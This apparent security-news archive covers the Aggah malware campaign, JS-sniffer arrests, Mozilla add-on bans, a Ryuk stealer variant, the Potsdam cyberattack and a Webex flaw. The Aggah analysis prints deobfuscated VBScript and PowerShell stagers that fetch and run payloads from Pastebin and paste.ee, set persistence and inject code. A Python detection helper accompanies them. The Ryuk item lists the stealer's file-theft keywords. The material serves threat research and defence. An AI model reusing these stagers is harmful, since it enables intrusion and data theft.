Category Archives: Hacking News

Zoom Bug Could Have Let Uninvited People Join Private Meetings

If you use Zoom to host your remote online meetings, you need to read this piece carefully. The massively popular video conferencing software has patched a security loophole that could have allowed anyone to remotely eavesdrop on unprotected active meetings, potentially exposing private audio, video, and documents shared throughout the session. Besides hosting password-protected virtual

Aggah: How to run a botnet without renting a Server (for more than a year)

Experts from Yoroi-Cybaze ZLab have spotted new attack attempts directed at some Italian companies operating in the retail sector and linked to the Aggah campaign.

Introduction

During the last year, we constantly kept track of the Aggah campaigns. We began by digging into the Roma225 campaign and went on with the RG campaign, contributing to the joint effort to track the offensive activities of this threat actor.

Recently, during our Cyber Defence monitoring operations, we spotted further attack attempts directed at some Italian companies operating in the retail sector. For this reason, the Cybaze-Yoroi ZLab team decided to dissect this latest Aggah campaign and track its most recent variations.

Technical Analysis

Hash: 77bbd615bc5b34ce007a82a7f365426fc1091ed7eeca3b3888d35b8242288184
Threat: Yakka3 Campaign
Brief Description: Malicious PPA file dropper with macro
Ssdeep: 1536:LEFGlBGHLAegbRrnDKSeJ8SuXCak5w/PYvwgqTtCxqTyU2wCNkY:LplBKLAegbRrnDKSeJ8SuXXk5ALgqd2

Table 1. Sample information

The initial file is a Microsoft PowerPoint PPA file. It is actually an add-in file, a format designed to add new behavior to classic PowerPoint presentations, used in this case to add a nasty macro:

Figure 1: Piece of the malicious macro

The malicious code within the PPA abuses the Microsoft mshta utility to download a web page from the BlogSpot platform.

Figure 2: Result of the Bit.ly link

The HTML page closely matches the modus operandi of the previous Aggah threat. In this case the blogspot post is named “20sydney new”, but it uses the same trick seen in the past: the JavaScript stager code is hidden inside the web page as an ad hoc code snippet that will be interpreted and executed only by the mshta engine.

Figure 3: Malicious code hidden in the Blogspot web page and executed by the MSHTA engine

The parameter passed to the “unescape()” function decodes into another two layers of encoded strings, a sort of “matrioska unescape obfuscation”. After peeling off these layers, we recovered the malicious logic of the stager:

  <script language="VBScript">
  Set M_c = CreateObject(StrReverse("llehS.tpircSW"))
  Dim L_c
  L_c = StrReverse("exe.drowniw mi/ f/ llikksat & exe.lecxe mi/ f/ llikksat c/ dmc")
  M_c.Run L_c, vbHide
  set Ixsi = CreateObject(StrReverse("llehS.tpircSW"))
  Dim Bik
  Bik1 = "mshta http:\\pastebin.com\raw\JELH48mw"
  Ixsi.run Bik1, vbHide
  set nci = CreateObject(StrReverse("llehS.tpircSW"))
  Dim xx
  xx1 = "r ""mshta http:\\pastebin.com\raw\JELH48mw"" /F "
  xx0 = StrReverse("t/ )+niam+( nt/ 06 om/ ETUNIM cs/ etaerc/ sksathcs")
  nci.run xx0 + xx1, vbHide
  Set ll = CreateObject(StrReverse("llehS.tpircSW"))
  no = StrReverse("mmetsaP\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH")
  ll.RegWrite no,"mshta http:\\pastebin.com\raw\NxJCPTmQ","REG_SZ"
  self.close
  </script>

Code Snippet 1

The first part of this initial implant aims to kill the Word and Excel processes. Immediately after that, the malware downloads further code by leveraging mshta once again, this time from a Pastebin snippet; it also schedules a task and writes an HKCU Run value so that the same mshta command is launched again later.
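As an added analyst helper (not code from the Yoroi/Cybaze report), the following Python un-reverses the StrReverse() literals of Code Snippet 1 so the commands become readable, and flags constructed Sysmon-style process and registry events that match the stager behaviours described above: Office processes killed, mshta fetching from a paste site, and schtasks or HKCU Run persistence that launches mshta. The event records and the PLACEHOLDER paste ID are constructed for the example; the hostnames and the Run key path come from the report.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Reversed literals exactly as they appear in Code Snippet 1 (order preserved).
REVERSED_STRINGS = [
    "llehS.tpircSW",
    "exe.drowniw mi/ f/ llikksat & exe.lecxe mi/ f/ llikksat c/ dmc",
    "t/ )+niam+( nt/ 06 om/ ETUNIM cs/ etaerc/ sksathcs",
    r"mmetsaP\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH",
]


def str_reverse(s: str) -> str:
    """Same effect as VBScript StrReverse(): reverse the character order."""
    return s[::-1]


def decode_snippet1() -> List[str]:
    """Readable form of every StrReverse() literal used by the stager."""
    return [str_reverse(s) for s in REVERSED_STRINGS]


@dataclass
class Event:
    kind: str          # "process" (process creation) or "registry" (value set)
    image: str         # image of the created process, or of the writing process
    command_line: str  # command line, or the registry value data for "registry"
    target: str = ""   # registry value path ("registry" events only)


PASTE_HOSTS = ("pastebin.com", "paste.ee", "blogspot.com")
# Accepts both http://host and the http:\\host form seen in the stager.
URL_RE = re.compile(r"https?:[\\/]{2}([\w.-]+)", re.IGNORECASE)
MSHTA_RE = re.compile(r"\bmshta(?:\.exe)?\b", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)
OFFICE_KILL_RE = re.compile(r"taskkill\b.*?/im\s+(?:winword|excel)\.exe", re.IGNORECASE)


def classify(ev: Event) -> List[str]:
    """Names of the stager behaviours that this single event matches."""
    hits: List[str] = []
    cl = ev.command_line
    image = ev.image.lower()
    hosts = [h.lower() for h in URL_RE.findall(cl)]
    uses_paste_site = any(h.endswith(p) for h in hosts for p in PASTE_HOSTS)
    if ev.kind == "process":
        if image.endswith("cmd.exe") and OFFICE_KILL_RE.search(cl):
            hits.append("office-process-kill")
        if image.endswith("mshta.exe") and uses_paste_site:
            hits.append("mshta-remote-paste")
        if image.endswith("schtasks.exe") and "/create" in cl.lower() and MSHTA_RE.search(cl):
            hits.append("schtasks-mshta-persistence")
    elif ev.kind == "registry":
        if RUN_KEY_RE.search(ev.target) and MSHTA_RE.search(cl):
            hits.append("run-key-mshta-persistence")
    return hits


def scan(events: List[Event]) -> Dict[int, List[str]]:
    """Map event index -> matched behaviours, only for events that matched."""
    result: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            result[i] = hits
    return result


# Constructed sample telemetry mirroring the stager's actions, plus benign look-alikes.
SYS32 = r"C:\Windows\System32"
PASTE = "http://pastebin.com/raw/PLACEHOLDER"   # constructed, not a real paste
SAMPLE_EVENTS = [
    Event("process", SYS32 + r"\cmd.exe",
          "cmd /c taskkill /f /im excel.exe & taskkill /f /im winword.exe"),
    Event("process", SYS32 + r"\mshta.exe", "mshta " + PASTE),
    Event("process", SYS32 + r"\schtasks.exe",
          'schtasks /create /sc MINUTE /mo 60 /tn (+main+) /tr "mshta ' + PASTE + '" /F'),
    Event("registry", SYS32 + r"\mshta.exe", "mshta " + PASTE + "2",
          r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Pastemm"),
    # Benign: a local HTA launched by mshta, no remote paste site involved.
    Event("process", SYS32 + r"\mshta.exe", r'mshta "C:\Program Files\Vendor\help.hta"'),
    # Benign: an ordinary Run value that does not invoke mshta.
    Event("registry", r"C:\Program Files\Vendor\setup.exe",
          r'"C:\Program Files\Vendor\agent.exe" /background',
          r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent"),
]

if __name__ == "__main__":
    for line in decode_snippet1():
        print(line)
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].command_line, "->", ", ".join(hits))
```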

Figure 4: Piece of the malicious Pastebin

The author of these pastes is no longer “HAGGA”, as seen in our previous analysis; the actor has now moved to another account, “YAKKA3”:

Figure 5: Evidence of YAKKA3 Pastebin user

The paste was created on 25 November 2019 and has likely been edited many times in the course of the last month. In the past Aggah frequently changed the content of its pastes to modify the malware behaviour and drop many kinds of malware, some of which were on occasion suspected to be related to the Gorgon APT group. In any case, during the analysis, the content of the encoded string was the following:

  <script language="VBScript">
  Set MVn = CreateObject(StrReverse("llehS.tpircSW"))
  Mcn = "powershell do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow$_$loadStri$_$g'.replace('$_$','n'),[Microsoft.VisualBasic.CallType]::Method,'https://paste.ee/r/Zhs3s')|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow$_$loadStri$_$g'.replace('$_$','n'),[Microsoft.VisualBasic.CallType]::Method,'https://paste.ee/r/Fk9yH').replace('*','0x')|IEX;[vroombrooomkrooom]::kekedoyouloveme('calc.exe',$f)"
  MVn.Run Mcn, vbHide
  self.close
  </script>

Code Snippet 2

The above script is a piece of VBScript designed to run a further PowerShell loader. The PowerShell script tests internet connectivity by pinging google.com and then starts the infection. It downloads two other pastes: the first is a PE file and the second is a custom .NET process injection utility.

The Injector

Hash: b8f6cad3723d1dd2219d02f930e5cda776c124387f19f3decd867495ce614eb7
Threat: Yakka3 Campaign
Brief Description: Injector through process hollowing
Ssdeep: 384:0UUX1vfjRPJok0e9i3h3i91/EPK59732wag7lRa3oNU1XURDlK67qfM9Wi:0X1qH3hBPU3B7K4NUJCDCfM

Table 2. Sample information of the injector

The injector component is invoked through its static method “[vroombrooomkrooom]::kekedoyouloveme(‘calc.exe’,$f)”, as seen in Code Snippet 2. The only purpose of this component is to inject a payload into the memory of another process, the one named in the first parameter.

Figure 6: Write Process Memory technique

The injection technique is very basic: it uses the textbook “CreateRemoteThread” technique, which is well documented and actively used by many actors and malware developers.

Figure 7: Injected payload inside calc.exe process

UAC Bypass Tool

In Code Snippet 1 we saw that the Aggah implant persists on the target machine by setting the “mshta http:[\\pastebin.]com\raw\NxJCPTmQ” command in the registry value “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Pastemm”, so it potentially loads a different payload on every run.

Figure 8: Piece of the malicious script executed by the persistence mechanism

Unlike the previous pastes, the author of this one is YAKKA4, probably a form of redundancy in case the other accounts are taken down.

Figure 9: YAKKA4 evidence

In any case, the code served by this paste downloads another binary file from an additional paste site, paste.ee.

  <script language=”VBScript”>
  Set i9i9 = CreateObject(“W” + “S” + “c” + “r” + “i” + “p” + “t” + “.” + “S” + “h” + “e” + “l” + “l”)
  i9i9.Run(“P” + “o” + “w” + “e” + “r” + “s” + “h” + “e” + “l” + “l” + “.” + “e” + “x” + “e -noexit [Byte[]]$sc64= iex(iex(‘(&” + “(GCM *W-O*)’+ ‘Net.’+” + “‘WebC’+’l” + “ient)’+’.Do” + “w’+’nload’+’Str’+’ing(”https://p” + “aste.ee/r/6EdQX”).repl” + “ace(”*^*”,”^%$”).r” + “e” + “p” + “l” + “a” + “c” + “e” + “(”^%$”,”0x”)’));[<##>” + “Ap” + “pDomain<##>]::<##>(‘(” + “&$@#$%^&*(urrent” + “Domain’.rep” + “lace(‘(&$@#$%^&*(‘,’C’))<##>.<##>(‘%” + “*&^*&^*&^*&^*&oad’.r” + “eplace(‘%” + “*&^*&^*&^” + “*&^*&” + “‘,’L’))(” + “$sc64).’EntryP” + “oint'<##>.<##>(‘in*&^*” + “&^*&^&*^*&^o” + “k))*()*)(**(&(*&’.r” + “e” + “p” + “l” + “a” + “c” + “e” + “(‘))*()*)(**” + “(&(*&’,’e’).r” + “e” + “p” + “l” + “a” + “c” + “e” + “(‘*&^” + “*&^*&^&*^*&^’,’v’))($null,$null)”),0
  self.close
  </script>

Code Snippet 3

This last binary is actually a hacking tool implementing the CMSTP bypass, a technique used to get around Windows UAC prompts.

According to the Microsoft Documentation, “Connection Manager is a suite of components that provides administrators with the ability to create and distribute customized remote access connections and to create, distribute, and automatically update customized phone books.”.

However, attackers can abuse a crafted INF file to make cmstp.exe execute arbitrary commands while bypassing UAC, elevating privileges in a stealthy way. In this case the CMSTP bypass technique is implemented inside a .NET executable.

Figure 10: Synthesis of the CMSTP Bypass technique

The Payload

As we saw in the past, Aggah has changed its payloads over time, and this time we observed that the delivered malware was not RevengeRAT but a LokiBot variant. This info stealer has been well known in the community since 2016 and has been analyzed in depth over the years.

In this case, it has the following configuration:

Figure 11: Loki Bot configuration with communication to the C2

The December Payloads

As anticipated above, Aggah payloads are quite dynamic. According to observations by community researchers such as @DrStache, the Aggah Pastebin accounts were dropping the AZORult infostealer a few days before the LokiBot observation.

Investigating the C2 infrastructure through the AZORult-Tracker service, we noticed that the AZORult malware distributed by Aggah in that period was targeting a modest number of victims, mainly located in the United States and the United Arab Emirates, and also in Pakistan, Germany and Israel.

Conclusions

The Aggah actor keeps threatening organizations all around the world. Over time it has built a custom stager implant based on legitimate third-party services, such as Pastebin and BlogSpot, which the actor abuses to manage the infected hosts and to run its botnet without renting a server.

During the last year we contributed to the joint effort to track its activities, along with PaloAlto’s Unit42, and after a year we can confirm it is still active and dangerous. At the moment it is not clear if this actor is just selling its hacking services or running its own campaigns, or both.

In conclusion, there is no hard evidence confirming or denying its potential relationship with the Gorgon APT, and factors such as the different nationalities and the small number of victims connected to the December Aggah activities do not help to exclude it.

Further technical details, including Indicators of Compromise (IoCs) and Yara rules, are reported in the analysis published by Yoroi-Cybaze ZLab:

Pierluigi Paganini

(SecurityAffairs – Aggah, botnet)

The post Aggah: How to run a botnet without renting a Server (for more than a year) appeared first on Security Affairs.

Operation Night Fury: Group-IB helps take down a cybergang behind the infection of hundreds of websites all over the world

More details have emerged on the recently disclosed Operation Night Fury, in which Group-IB helped take down a cybergang behind the infection of hundreds of e-commerce websites.

Operators of the JavaScript-sniffer family, dubbed «GetBilling» by Group-IB, were arrested in Indonesia. The arrest came as a result of a joint operation «Night Fury» initiated by INTERPOL’s ASEAN Cyber Capability Desk (ASEAN Desk) that involved Indonesian Cyber Police (BARESKRIM POLRI (Dittipidsiber)) and Group-IB’s APAC Cyber Investigations Team.

The operation is still ongoing in five ASEAN countries with which the intelligence was also shared. This case marks the first successful multi-jurisdictional operation against the operators of JavaScript-sniffers in the region. According to Group-IB’s data, the suspects have managed to infect hundreds of websites in various locations, including in Indonesia, Australia, the United Kingdom, the United States, Germany, Brazil, and some other countries. Payment and personal data of thousands of online shoppers from Asia, Europe, and the Americas have been stolen.

The three suspects with the initials «ANF» (27 y.o.), «K» (35 y.o.), and «N» (23 y.o.) were arrested in December 2019 in two different regions in Indonesia — Special Region of Yogyakarta and Special Capital Region of Jakarta — as part of the joint operation «Night Fury» carried out by Indonesian Cyber Police and INTERPOL with the help of Group-IB’s Cyber Investigations team. During the special operation, Indonesian Cyber Police seized laptops, mobile phones of various brands, CPU units, IDs, BCA Token, ATM cards. The suspected operators of the GetBilling JavaScript-sniffer family are charged with the theft of electronic data, which carries up to a 10-year jail sentence in accordance with Indonesian criminal code.

“Strong and effective partnerships between police and the cybersecurity industry are essential to ensure law enforcement worldwide has access to the information they need to address the scale and complexity of today’s cyberthreat landscape. This successful operation is just one example of how law enforcement are working with industry partners, adapting and applying new technologies to aid investigations and ultimately reduce the global impact of cybercrime,” concluded Mr Jones.

Craig Jones

INTERPOL’s Director of Cybercrime

“There are many challenges and obstacles in cross-border hi-tech crime investigations like this. The Night Fury Operation showed that these obstacles could only be overcome with close collaboration between national law enforcement, international organizations and private companies. Effective multi-jurisdictional coordination of efforts between Indonesia’s Cyber Police, INTERPOL and Group-IB allowed to attribute the crimes, establish the perpetrators behind the JS-sniffer and arrest them. But more importantly to protect the community and raise public awareness about the problem of cybercrime and its impact.”

Idam Wasiadi

Police Superintendent, Cybercrime Investigator at Directorate of Cybercrime of CID of Indonesian National Police

“With cybercrime being a growing threat across the region, the ASEAN Desk was launched by INTERPOL to assist law enforcement agencies enhance their proactive response against cybercrime. Through this operation, it is clear that timely intelligence sharing and coordinated actions are the ways forward to effectively combat cybercrime regionally and globally.”

James Tan

INTERPOL Acting Assistant Director (Strategy & Capabilities Development)

JavaScript-sniffers (JS-sniffers) targeting e-commerce websites are a type of malicious JavaScript code designed to steal customer payment and personal data such as credit card numbers, names, addresses, logins, phone numbers, and credentials for payment systems.

Group-IB has been tracking the GetBilling JS-sniffer family since 2018. The analysis of infrastructure that was controlled by the suspected operators of GetBilling arrested in Indonesia, carried out by Group-IB’s Cyber Investigations team, revealed that they have managed to infect nearly 200 websites in Indonesia, Australia, Europe, the United States, South America, and some other countries. However, the investigation in other ASEAN countries continues, and the number of websites infected with GetBilling family is likely to be higher. According to the investigation, stolen payment data was used by the suspects to buy goods, such as electronic devices or other luxury items, which they tried to resell online in Indonesia at below the market price.

Fig. 1 Example of GetBilling’s malicious script

Fig. 2 Example of stolen payment and personal data stored on GetBilling’s servers

Group-IB Cyber Investigations team determined that some of the GetBilling’s infrastructure was located in Indonesia. Upon discovery of this information, INTERPOL’s ASEAN Desk promptly notified Indonesian cyber police. Further investigation discovered that the GetBilling’s operators were not new to the world of cybercrime. To access their servers for stolen data collection and their JS-sniffers’ control, they always used VPN to hide their real location and identity. To pay for hosting services and buy new domains the gang members only used stolen cards. Despite that, Indonesian cyber police in cooperation with INTERPOL and Group-IB’s Cyber Investigations team managed to establish that the group was operating from Indonesia.

“This case showed the nature of cybercrime — the operators of the JS-sniffer lived in one country attacking websites all around the world. It makes evidence collection, identification of suspects, and prosecution more complicated. Another thing that the case demonstrated vividly is that international cooperation and cyber intelligence data exchange can help effectively tackle modern cyber threats. Thanks to Indonesian Cyber Police and INTERPOL’s prompt actions, Night Fury became the first successful multi-jurisdictional operation against the operators of JavaScript-sniffers in the APAC region. It is a great example of coordinated cross-border anti-cybercrime effort, and we are proud that our threat intelligence and digital forensics expertise helped to establish the suspects. We hope this will set a precedent for law enforcement in jurisdiction too.”

Vesta Matveeva

Head of Group-IB’s APAC Cyber Investigations Team

By leveraging its own infrastructure for monitoring underground forums and card shops, Group-IB has collected comprehensive information about the carding market and is capable of identifying various anomalies. According to Group-IB’s annual 2019 threat report, the number of compromised cards uploaded to underground forums increased from 27.1 million to 43.8 million in H2 2018-H1 2019 year-on-year. The size of the carding market, in turn, grew by 33 percent and amounted to USD 879.7 million. The sale of CVV data is also on the rise today, having increased by 19 percent in the corresponding period, and one of the key reasons behind this trend could be JavaScript-sniffers.

The GetBilling family was first described in Group-IB’s 2019 report «Crime without punishment», a deep dive into the world of JS-sniffers. According to the author of the report, Viktor Okorokov, threat intelligence analyst at Group-IB, at the time of the report’s publication the Group-IB Threat Intelligence team had discovered 38 families of JS-sniffers in total. Since then, the number of JS-sniffer families discovered by the company has almost doubled and continues to grow. JS-sniffers have caused many security incidents in the past — the infection of the British Airways website and mobile app, the payment-card attack on the UK website of the international company FILA, etc. — and continue to gain popularity among cybercriminals. Most recently, in December 2019, JS-sniffers hit the APAC region, infecting the websites of the Singaporean fashion brand «Love, Bonito».

To avoid big financial losses due to JS-sniffers, online users are advised to have a separate pre-paid card for online payments, to set spending limits on cards used for online shopping, or even to use a separate bank account exclusively for online purchases. Online merchants, in their turn, need to keep their software updated and carry out regular cybersecurity assessments of their websites.


About the author Group-IB:

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection. Group-IB is a partner of INTERPOL and Europol, and has been recommended by the OSCE as a cybersecurity solutions provider. Group-IB is a member of the World Economic Forum.

Pierluigi Paganini

(SecurityAffairs – Operation Night Fury, hacking)

The post Operation Night Fury: Group-IB helps take down a cybergang behind the infection of hundreds of websites all over the world appeared first on Security Affairs.

Mozilla banned hundreds of malicious Firefox add-ons over the last weeks

Mozilla is intensifying its efforts to protect its users: in the last couple of weeks, its security staff has banned 200 malicious Firefox add-ons.

Over the past two weeks, Mozilla has reviewed and banned 197 Firefox add-ons because they were executing malicious code. The malicious Firefox add-ons were found stealing user data and for this reason, they were removed from the Mozilla Add-on (AMO) portal.

Mozilla also disabled the malicious add-ons in the browsers of the users who have already installed them.

The add-ons were using obfuscation to hide their source code and were downloading and executing code from a remote server, a behavior that violates the policy of the portal. Downloading code from a remote server allows threat actors to execute malicious code within the browser once it is dynamically fetched from a server under their control.

Mozilla banned 14 Firefox add-ons ([1], [2], [3]) because they were using obfuscated code and potentially hiding malicious code.

Most of the banned apps have been developed by 2Ring, a provider of B2B software.

Mozilla banned for the same reason six Firefox add-ons developed by Tamo Junto Caixa, and three add-ons that were fake premium products.

Mozilla also banned an unnamed add-on, WeatherPool and Your Social, Pdfviewer – tools, RoliTrade, and Rolimons Plus for collecting user data without consent.

The organization also banned another 30 add-ons for malicious behavior.

Firefox also reported the case of an add-on named Fake Youtube Downloader that was spotted attempting to install malware in users’ browsers.

Mozilla also banned Firefox add-ons such as EasySearch for Firefox, EasyZipTab, ConvertToPDF, and FlixTab Search because they were intercepting and collecting user search terms, a behavior that violates the rules.

Pierluigi Paganini

(SecurityAffairs – Mozilla, Firefox)

The post Mozilla banned hundreds of malicious Firefox add-ons over the last weeks appeared first on Security Affairs.

A new piece of Ryuk Stealer targets government, military and finance sectors

A new piece of the Ryuk malware has been improved to steal confidential files related to the military, government, financial statements, and banking.

Security experts from MalwareHunterTeam have discovered a new version of the Ryuk Stealer malware that has been enhanced to allow its operators to steal a greater amount of confidential files related to the military, government, financial statements, and banking.

In September 2019, BleepingComputer reported the discovery of a new piece of malware that included references to the Ryuk Ransomware and that was used to steal files with filenames matching certain keywords.

It is not clear if the malware was developed by the threat actors behind Ryuk Ransomware for data exfiltration.

“It is likely the same actor with the access to the earlier Ryuk version who repurposed the code portion for this stealer,” explained the popular malware researcher Vitali Kremez.

“What we do know is that the malware is targeting very specific keywords that could be disastrous for governments, military operations, and law enforcement cases if the stolen files are exposed.” reported BleepingComputer.

The new variant of the Ryuk Stealer malware implements a new file content scanning feature and is able to search for additional keywords in the filenames for data exfiltration.

Source BleepingComputer

The variant of the Ryuk Stealer recently discovered is able to look for C++ code files (i.e. .cpp), further Word and Excel document types, PDFs, JPG image files, and also files associated with cryptocurrency wallets.

The scanning module first checks whether the files on the system have one of the above extensions, then it checks the contents of those files for the presence of one of the following keywords.

'personal', 'securityN-CSR10-SBEDGAR', 'spy', 'radar', 'agent', 'newswire', 'marketwired', '10-Q', 'fraud', 'hack', 'defence', 'treason', 'censored', 'bribery', 'contraband', 'operation', 'attack', 'military', 'tank', 'convict', 'scheme', 'tactical', 'Engeneering', 'explosive', 'drug', 'traitor', 'suspect', 'cyber', 'document', 'embeddedspy', 'radio', 'submarine', 'restricted', 'secret', 'balance', 'statement', 'checking', 'saving', 'routing', 'finance', 'agreement', 'SWIFT', 'IBAN', 'license', 'Compilation', 'report', 'secret', 'confident', 'hidden', 'clandestine', 'illegal', 'compromate', 'privacy', 'private', 'contract', 'concealed', 'backdoorundercover', 'clandestine', 'investigation', 'federal', 'bureau', 'government', 'security', 'unclassified', 'seed', 'personal', 'confident', 'mail', 'letter', 'passport', 'victim', 'court', 'NATO', 'Nato', 'scans', 'Emma', 'Liam', 'Olivia', 'Noah', 'William', 'Isabella', 'James', 'Sophia', 'Logan', 'Clearance'

In addition, the stealer also checks the filenames for the presence of one of 55 other keywords.

Once a document has passed the checks, it is uploaded to an FTP site. Experts pointed out that the code of the Ryuk stealer includes two FTP sites; both were unreachable at the time of the analysis.

The keywords targeted by the new variant of the Ryuk stealer confirm that the attackers are looking for confidential information in the military, banking, finance and law enforcement sectors.

Another aspect to consider is that ransomware operators are also interested in stealing sensitive data from their victims and using it to blackmail them into paying the ransom, as the Maze ransomware gang does.

Pierluigi Paganini

(SecurityAffairs – Ryuk stealer, hacking)

The post A new piece of Ryuk Stealer targets government, military and finance sectors appeared first on Security Affairs.

City of Potsdam offline following a cyberattack

The City of Potsdam suffered a major cyberattack that took down its servers earlier this week, but emergency services were not impacted.

The German City of Potsdam has suffered a major cyberattack that took down its servers earlier this week; the good news is that emergency services, including the city’s fire department, remained fully operational and payments were not affected.

Potsdam is the capital and largest city of the German federal state of Brandenburg. It directly borders the German capital, Berlin, and is part of the Berlin/Brandenburg Metropolitan Region.

The intrusion into the Potsdam administration’s servers was discovered on Tuesday, and on Wednesday evening systems were disconnected from the Internet to contain the infection and prevent data exfiltration.

“The state capital Potsdam has switched off the administration’s internet connection and is therefore no longer accessible by email.” reads the advisory published by the City of Potsdam.

“We put our systems offline for security reasons, because we have to assume an illegal cyber attack,” said Mayor Mike Schubert. “We are working flat out to ensure that the affected administration systems are switched on again as soon as possible and that we can work safely again. In the meantime, we ask for your patience in all matters relating to the citizen service facilities.”

The IT staff noticed “numerous inconsistencies” in the state capital’s central access systems. Experts observed a system belonging to an external provider that was attempting, from outside and without authorization, to retrieve data from the state capital or to install malware.

The City of Potsdam hired external IT security companies and IT forensic experts to investigate the attack.

The state capital has filed criminal charges against unknown individuals and notified the incident to the regional offices responsible for IT security and data protection.

The City published an update announcing that Potsdam’s administration is not able to receive emails from outside, and that incoming emails won’t be forwarded either.

Citizens can contact the City by calling the Potsdam administration staff on the phone or by submitting their applications in writing by post.

“After switching off the Internet connection of the state capital Potsdam, the citizen service of the state capital Potsdam is currently only of limited use.” reads the update. “The administration can currently not receive emails from outside and incoming emails are also not forwarded. For this reason, it is necessary for citizens to submit all applications in writing to the administration by post. The employees are still available by phone for questions.”

The City of Potsdam did not provide details on the attack, but German journalist Hanno Böck reported that Citrix ADC servers on the administration’s network are affected by the CVE-2019-19781 vulnerability.

Citrix has started addressing the CVE-2019-19781 vulnerability in Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances.

Pierluigi Paganini

(SecurityAffairs – Potsdam, hacking)

The post City of Potsdam offline following a cyberattack appeared first on Security Affairs.

Security Affairs newsletter Round 248

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Bot list with Telnet credentials for more than 500,000 servers and IoT devices leaked online
Hackers patch Citrix servers to deploy their own backdoor
Citrix releases permanent fixes for CVE-2019-19781 flaw in ADC 11.1 and 12.0
JhoneRAT uses Google Drive, Twitter, ImgBB, and Google Forms to target countries in Middle East
Mitsubishi Electric discloses data breach, media blame China-linked APT
NATO will send a counter-hybrid team to Montenegro to face Russia’s threat
WP Database Reset WordPress plugin flaws allow website takeover
Expert found a hardcoded SSH Key in Fortinet SIEM appliances
NIST releases version 1.0 of the Privacy Framework
The Mystery of Fbot
US-based children’s clothing maker Hanna Andersson discloses a data breach
Yomi Hunter Catches the CurveBall
Jeff Bezos phone was hacked by Saudi crown prince
Malware attack took down 600 computers at Volusia County Public Library
OP Glowing Symphony – How US military claims to have disrupted ISIS’s propaganda
250 Million Microsoft customer support records and PII exposed online
Iran-Linked PupyRAT backdoor used in recent attacks on European energy sector
THSuite data leak exposes cannabis users information
Cisco fixes critical issue in Cisco Firepower Management Center
Expert released DOS Exploit PoC for Critical Windows RDP Gateway flaws
NK CARROTBALL dropper used in attacks on U.S. Govn Agency
Russian operator of Cardplanet carding site pleads guilty in the US
Chinese hackers exploited a Trend Micro antivirus zero-day used in Mitsubishi Electric hack
Cisco Webex flaw allows unauthenticated remote attackers to join private meetings
For the second time in a few days, Greek Government websites hit by DDoS attacks

Pierluigi Paganini

(SecurityAffairs – Newsletter, hacking)

The post Security Affairs newsletter Round 248 appeared first on Security Affairs.

Cisco Webex flaw allows unauthenticated remote attackers to join private meetings

Cisco addressed a vulnerability in Cisco Webex that could be exploited by a remote, unauthenticated attacker to join a protected video conference meeting.

Cisco has addressed a high-severity flaw in the Cisco Webex video conferencing platform (CVE-2020-3142) that could be exploited by a remote, unauthenticated attacker to enter a password-protected video conference meeting.

In order to exploit the CVE-2020-3142 flaw, the attacker only needs to know the meeting ID: once it is entered in the Webex mobile application for either iOS or Android, it allows the attacker to join the meeting, bypassing the password check.

“A vulnerability in Cisco Webex Meetings Suite sites and Webex Meetings Online sites could allow an unauthenticated, remote attendee to join a password-protected meeting without providing the meeting password. The connection attempt must initiate from a Webex mobile application for either iOS or Android.” reads the security advisory published by Cisco. “An unauthorized attendee could exploit this vulnerability by accessing a known meeting ID or meeting URL from the mobile device’s web browser.”

The CVE-2020-3142 vulnerability received a CVSS score of 7.5 out of 10; Cisco discovered it while its experts were resolving a Cisco TAC support case.

Fortunately, the presence of attackers in a meeting is easy to detect: unauthorized attendees appear in the meeting's attendee list as mobile attendees.

The vulnerability affects Cisco Webex Meetings Suite sites earlier than version 39.11.5 and Cisco Webex Meetings Online sites earlier than version 40.1.3.

Cisco addressed CVE-2020-3142 in versions 39.11.5 and later of Webex Meetings Suite sites and 40.1.3 and later of Webex Meetings Online sites.

The good news is that the Cisco Product Security Incident Response Team (PSIRT) is not aware of any attack exploiting the vulnerability in the wild.

A couple of weeks ago, Cisco Systems released security fixes for two high-severity vulnerabilities in its products, including a remote code execution flaw in the Webex video conferencing platform.

The Webex flaw addressed by Cisco resides in the web-based management interface of Webex Video Mesh, a feature that enables on-premises infrastructure for video conferencing.

This flaw affects Webex Video Mesh Software releases earlier than 2019.09.19.1956m.

Pierluigi Paganini

(SecurityAffairs – Webex, hacking)

The post Cisco Webex flaw allows unauthenticated remote attackers to join private meetings appeared first on Security Affairs.

Russian operator of Cardplanet carding site pleads guilty in the US

A Russian national pleaded guilty this week to running a carding website called Cardplanet that helped people commit credit-card fraud.

Last year, Aleksei Burkov (29), a Russian national, was accused of running an online criminal marketplace called Cardplanet that helped crooks carry out more than $20 million in credit card fraud. In November, the suspect was extradited to the US to face criminal charges.

Burkov also operated another invite-only cybercrime forum: to obtain membership, prospective members needed three existing members to “vouch” for their good reputation in the cybercrime community and had to deposit a sum of money, normally $5,000, as insurance. Cardplanet offered stolen credit-card numbers for sale at prices ranging from $3 to $60.

The suspect was arrested in Israel in 2015, and his case made the headlines multiple times because media speculated about a possible prisoner swap with Naama Issachar, an Israeli-American arrested in Russia on cannabis charges. In October, the Israeli justice minister approved the extradition of Aleksei Burkov to the United States.

Burkov entered the plea to charges including fraud and money laundering in a federal court in Alexandria.

